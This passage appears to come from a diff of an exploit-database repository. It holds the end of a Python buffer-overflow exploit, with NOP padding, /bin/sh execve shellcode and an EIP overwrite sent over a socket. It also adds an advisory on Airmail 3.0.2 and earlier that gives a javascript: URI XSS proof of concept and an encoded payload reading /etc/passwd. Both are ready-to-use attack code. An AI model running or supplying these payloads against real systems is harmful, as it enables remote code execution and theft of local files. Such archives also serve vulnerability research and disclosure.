buf += "\x68\x20\x5a\x50\x65\x30\x20\x7c\x24\x4b\x65\x79"
|
||||
buf += "\x61\x7c\x24\x56\x61\x6c\x69\x64\x61\x74\x65\x4e"
|
||||
buf += "\x69\x63\x6b\x20\x50\x69\x65\x72\x72\x65\x7c\x24"
|
||||
buf += "\x56\x65\x6e\x20\x31\x2c\x30\x30\x39\x31\x7c\x24"
|
||||
buf += "\x47\x01\x00\x4e\x3b\x63\x6b\x4c\x69\x73\x74\x7c"
|
||||
buf += "\x24\x4d\x79\x49\x4e\x46\x4f\x20\x24\x41\x4c\x4c"
|
||||
buf += "\x20\x50\x69\x65\x72\x72\x65\x20\x4a\x65"
|
||||
|
||||
#NEED padding of 96
|
||||
shellcode = "\x90" *30
|
||||
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
|
||||
shellcode += "\x90"*42
|
||||
print "Shellcode len: "
|
||||
print len(shellcode)
|
||||
|
||||
buf2 = "\x61\x3c"
|
||||
buf2 += "\x3c\x24\x4d\x79\x80\x00\x35\x24\x70\x69\x24\x30"
|
||||
buf2 += "\x24\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37"
|
||||
buf2 += "\x37\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf2 += "\xb1\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c"
|
||||
|
||||
eip_overwrite = "\x2a\x6a\x06\x08"
|
||||
#eip_overwrite = "AAAA"
|
||||
buf3 = "\xd6\x26\x06\x08\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1"
|
||||
buf3 += "\xb1\xb1\xb1\xb1\x37\x37\x30\x2c\x49\x4e\x46\x4f"
|
||||
buf3 += "\x24\xca\xca\xca\xca\x20\x5a\x50\x65\x30\x20\x7c"
|
||||
buf3 += "\x24\x4b\x65\x79\x61\x7c\x24\x56\x20\x41\x20\x30"
|
||||
buf3 += "\x61\x7c\x24\x56\x69\x63\x6b\x20\x50\x69\xca\xca"
|
||||
buf3 += "\x0a"
|
||||
|
||||
# Send EVIL PACKET !
|
||||
s.sendall(buf + shellcode + buf2 + eip_overwrite + buf3)
|
||||
s.close()
|
36
platforms/osx/webapps/40359.txt
Executable file
36
platforms/osx/webapps/40359.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
Airmail is a popular email client on iOS and OS X.
|
||||
I found a vulnerability in airmail of the latest version which could cause
|
||||
a file:// xss and arbitrary file read.
|
||||
|
||||
Author: redrain, yu.hong@chaitin.com
|
||||
Date: 2016-08-15
|
||||
Version: 3.0.2 and earlier
|
||||
Platform: OS X and iOS
|
||||
Site: http://airmailapp.com/
|
||||
Vendor: http://airmailapp.com/
|
||||
Vendor Notified: 2016-08-15
|
||||
|
||||
Vulnerability:
|
||||
There is a file:// xss in airmail version 3.0.2 and earlier.
|
||||
The app can deal the URLscheme render with link detection, any user can
|
||||
edit the email content in reply with the evil code with the TL;DR.
|
||||
|
||||
Airmail implements its user interface using an embedded version of WebKit,
|
||||
furthermore Airmail on OS X will render any URI as a clickable HTML <a
|
||||
href= link. An attacker can create a simple JavaScript URI (e.g.,
|
||||
javascript:) which when clicked grants the attacker initial JavaScript
|
||||
execution (XSS) in the context of the application DOM.
|
||||
|
||||
|
||||
PoC:
|
||||
javascript://www.baidu.com/research?%0Aprompt(1)
|
||||
|
||||
a
|
||||
|
||||
Arbitrary file read:
|
||||
|
||||
javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%
|
||||
20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%
|
||||
20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%
|
||||
22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%
|
||||
20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B
|
Loading…
Add table
Reference in a new issue